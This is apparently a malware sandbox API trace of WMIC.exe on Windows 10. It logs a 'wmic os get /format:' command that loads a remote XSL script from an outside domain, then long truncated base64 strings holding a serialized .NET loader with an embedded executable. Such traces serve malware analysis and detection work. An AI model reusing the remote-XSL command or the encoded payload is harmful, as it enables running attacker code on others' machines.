	[0111.514] ??0CHString@@QEAA@PEBG@Z () returned 0xd7edd8f948
	[0111.514] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xd7edd8f948
	[0111.514] lstrlenW (lpString="LIST") returned 4
	[0111.514] lstrlenW (lpString="get") returned 3
	[0111.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
	[0111.514] lstrlenW (lpString="ASSOC") returned 5
	[0111.514] lstrlenW (lpString="get") returned 3
	[0111.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
	[0111.514] lstrlenW (lpString="GET") returned 3
	[0111.514] lstrlenW (lpString="get") returned 3
	[0111.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0111.514] GetCurrentThreadId () returned 0x6bc
	[0111.514] ??0CHString@@QEAA@XZ () returned 0xd7edd8f790
	[0111.514] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x2ad207b6f20, bstrXML="<COMMAND SEQUENCENUM=\"1\" ISSUEDFROM=\"X2VS1CUM\" STARTTIME=\"06-26-2018T23:00:06\" EVERYCOUNT=\"0\"><REQUEST><COMMANDLINE>  os get /format:&quot;https://itaxkenya.com/kra/tax_returns.xsl&quot; </COMMANDLINE><COMMANDLINECOMPONENTS><NODELIST><NODE>X2VS1CUM</NODE></NODELIST></COMMANDLINECOMPONENTS><CONTEXT><NAMESPACE>root\\cimv2</NAMESPACE><ROLE>root\\cli</ROLE><IMPLEVEL>IMPERSONATE</IMPLEVEL><AUTHLEVEL>PKTPRIVACY</AUTHLEVEL><LOCALE>ms_409</LOCALE><PRIVILEGES>ENABLE</PRIVILEGES><TRACE>OFF</TRACE><RECORD>N/A</RECORD><INTERACTIVE>OFF</INTERACTIVE><FAILFAST>OFF</FAILFAST><OUTPUT>STDOUT</OUTPUT><APPEND>STDOUT</APPEND><USER>N/A</USER><AGGREGATE>ON</AGGREGATE></CONTEXT></REQUEST><RESULTS NODE=\"X2VS1CUM\"><CIM><INSTANCE CLASSNAME=\"Win32_OperatingSystem\"><PROPERTY NAME=\"BootDevice\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>\\Device\\HarddiskVolume1</VALUE></PROPERTY><PROPERTY NAME=\"BuildNumber\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>10586</VALUE></PROPERTY><PROPERTY NAME=\"BuildType\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Multiprocessor Free</VALUE></PROPERTY><PROPERTY NAME=\"Caption\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro</VALUE></PROPERTY><PROPERTY NAME=\"CodeSet\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1252</VALUE></PROPERTY><PROPERTY NAME=\"CountryCode\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1</VALUE></PROPERTY><PROPERTY NAME=\"CreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_OperatingSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSCreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_ComputerSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSDVersion\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"string\"></PROPERTY><PROPERTY NAME=\"CSName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>X2VS1CUM</VALUE></PROPERTY><PROPERTY NAME=\"CurrentTimeZone\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"sint16\"><VALUE>120</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_32BitApplications\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Available\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Drivers\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_SupportPolicy\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"Debug\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"Description\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE></VALUE></PROPERTY><PROPERTY NAME=\"Distributed\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"EncryptionLevel\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>256</VALUE></PROPERTY><PROPERTY NAME=\"ForegroundApplicationBoost\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"FreePhysicalMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>385684</VALUE></PROPERTY><PROPERTY NAME=\"FreeSpaceInPagingFiles\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>3593388</VALUE></PROPERTY><PROPERTY NAME=\"FreeVirtualMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>968780</VALUE></PROPERTY><PROPERTY NAME=\"InstallDate\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"datetime\"><VALUE>20170802150607.000000+120</VALUE></PROPERTY><PROPERTY NAME=\"LargeSystemCache\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"LastBootUpTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626225658.765149+120</VALUE></PROPERTY><PROPERTY NAME=\"LocalDateTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626230007.241000+120</VALUE></PROPERTY><PROPERTY NAME=\"Locale\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>0409</VALUE></PROPERTY><PROPERTY NAME=\"Manufacturer\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Microsoft Corporation</VALUE></PROPERTY><PROPERTY NAME=\"MaxNumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>4294967295</VALUE></PROPERTY><PROPERTY NAME=\"MaxProcessMemorySize\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>137438953344</VALUE></PROPERTY><PROPERTY.ARRAY NAME=\"MUILanguages\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE.ARRAY><VALUE>en-US</VALUE></VALUE.ARRAY></PROPERTY.ARRAY><PROPERTY NAME=\"Name\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfLicensedUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"NumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>61</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=", isSuccessful=0xd7edd8f780 | out: isSuccessful=0xd7edd8f780*=0xffff) returned 0x0
	[0111.516] ??0CHString@@QEAA@XZ () returned 0xd7edd8f480
	[0111.516] GetCurrentThreadId () returned 0x6bc
	[0111.517] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x2ad207be7b0, async=0) returned 0x0
	[0111.517] SysStringByteLen (bstr="https://itaxkenya.com/kra/tax_returns.xsl") returned 0x52
	[0113.523] __dllonexit () returned 0x7ffbf6174770
	[0113.523] __dllonexit () returned 0x7ffbf6174780
	[0113.523] __dllonexit () returned 0x7ffbf61747a0
	[0113.523] __dllonexit () returned 0x7ffbf61747c0
	[0113.523] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xd7edd8c890, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
	[0113.523] _splitpath_s (in: _FullPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", _Drive=0x0, _DriveSize=0x0, _Dir=0x0, _DirSize=0x0, _Filename=0xd7edd8ca10, _FilenameSize=0x104, _Ext=0x0, _ExtSize=0x0 | out: _Drive=0x0, _Dir=0x0, _Filename="WMIC", _Ext=0x0) returned 0x0
	[0113.523] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0xd7edd8c9f8 | out: phkResult=0xd7edd8c9f8*=0x0) returned 0x2
	[0113.526] GetVersion () returned 0x295a000a
	[0113.526] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffc17120000
	[0113.526] GetProcAddress (hModule=0x7ffc17120000, lpProcName="QueryProtectedPolicy") returned 0x7ffc145c02d0
	[0113.527] VirtualProtect (in: lpAddress=0x7ffbf61cf668, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0xd7edd8cb40 | out: lpflOldProtect=0xd7edd8cb40*=0x2) returned 1
	[0113.527] VirtualProtect (in: lpAddress=0x7ffbf61cf668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xd7edd8cb40 | out: lpflOldProtect=0xd7edd8cb40*=0x4) returned 1
	[0113.528] GetUserDefaultLCID () returned 0x409
	[0113.528] GetACP () returned 0x4e4
	[0113.528] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffbf68c0000
	[0113.530] GetProcAddress (hModule=0x7ffbf68c0000, lpProcName="AmsiInitialize") returned 0x7ffbf68c2260
	[0113.530] GetProcAddress (hModule=0x7ffbf68c0000, lpProcName="AmsiScanString") returned 0x7ffbf68c26b0
	[0113.530] AmsiInitialize () returned 0x80070103
	[0113.531] GetCurrentThreadId () returned 0x6bc
	[0113.532] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ef48 | out: phkResult=0xd7edd8ef48*=0x544) returned 0x0
	[0113.532] RegQueryValueExA (in: hKey=0x544, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0xd7edd8ef40, lpData=0xd7edd8ef38, lpcbData=0xd7edd8ef30*=0x4 | out: lpType=0xd7edd8ef40*=0x4, lpData=0xd7edd8ef38*=0x1, lpcbData=0xd7edd8ef30*=0x4) returned 0x0
	[0113.532] RegCloseKey (hKey=0x544) returned 0x0
	[0113.532] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffc14550000
	[0113.532] GetProcAddress (hModule=0x7ffc14550000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffc145af670
	[0113.532] GetProcAddress (hModule=0x7ffc14550000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffc14611540
	[0113.533] CoCreateInstance (in: rclsid=0x7ffbf61d2de0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf61d2dd0*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8eef0 | out: ppv=0xd7edd8eef0*=0x7ffc16209610) returned 0x0
	[0113.534] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0xd7edd8eed0, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0113.534] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0113.535] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xd7edd8ef70, cchData=6 | out: lpLCData="1252") returned 5
	[0113.535] IsValidCodePage (CodePage=0x4e4) returned 1
	[0113.535] CoCreateInstance (in: rclsid=0x7ffbf61d0940*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf61d0900*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2ad22a67548 | out: ppv=0x2ad22a67548*=0x2ad22c7f740) returned 0x0
	[0113.535] IUnknown:AddRef (This=0x2ad22c7f740) returned 0x2
	[0113.535] GetCurrentProcessId () returned 0x434
	[0113.535] GetCurrentThreadId () returned 0x6bc
	[0113.536] GetTickCount () returned 0x2e97b
	[0113.536] ISystemDebugEventFire:BeginSession (This=0x2ad22c7f740, guidSourceID=0x7ffbf61d0930, strSessionName="JScript:00001076:00001724:18190843") returned 0x0
	[0113.536] GetCurrentThreadId () returned 0x6bc
	[0113.537] GetCurrentThreadId () returned 0x6bc
	[0113.544] GetUserDefaultLCID () returned 0x409
	[0113.544] GetACP () returned 0x4e4
	[0113.544] ISystemDebugEventFire:EndSession (This=0x2ad22c7f740) returned 0x0
	[0113.544] IUnknown:Release (This=0x2ad22c7f740) returned 0x1
	[0113.545] IUnknown:Release (This=0x2ad22c7f740) returned 0x0
	[0113.545] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
	[0113.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0xd7edd8f390 | out: lpConsoleScreenBufferInfo=0xd7edd8f390) returned 1
	[0113.599] IsValidCodePage (CodePage=0x4e4) returned 1
	[0113.600] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8eff8 | out: ppv=0xd7edd8eff8*=0x2ad205dbe18) returned 0x0
	[0113.601] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8f0b8 | out: ppv=0xd7edd8f0b8*=0x2ad205dbe18) returned 0x0
	[0113.601] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8f080 | out: ppv=0xd7edd8f080*=0x2ad205dbe18) returned 0x0
	[0113.616] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8da40 | out: ppv=0xd7edd8da40*=0x2ad205dbe18) returned 0x0
	[0113.706] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8da40 | out: ppv=0xd7edd8da40*=0x2ad205dbe18) returned 0x0
	[0113.706] MulDiv (nNumber=405, nNumerator=100, nDenominator=1516) returned 27
	[0113.706] CLSIDFromProgID (in: lpszProgID="System.Text.ASCIIEncoding", lpclsid=0xd7edd8d660 | out: lpclsid=0xd7edd8d660*(Data1=0x9e28ef95, Data2=0x9c6f, Data3=0x3a00, Data4=([0]=0xb5, [1]=0x25, [2]=0x36, [3]=0xa7, [4]=0x61, [5]=0x78, [6]=0xcc, [7]=0x9c))) returned 0x0
	[0113.707] SysStringLen (param_1=0x0) returned 0x0
	[0113.940] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
	[0113.941] CoUninitialize () 
	[0114.097] SysStringLen (param_1="AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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") returned 0xa970
	[0114.101] SysStringLen (param_1="AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYRAAAALFN5c3RlbS5PYmplY3Q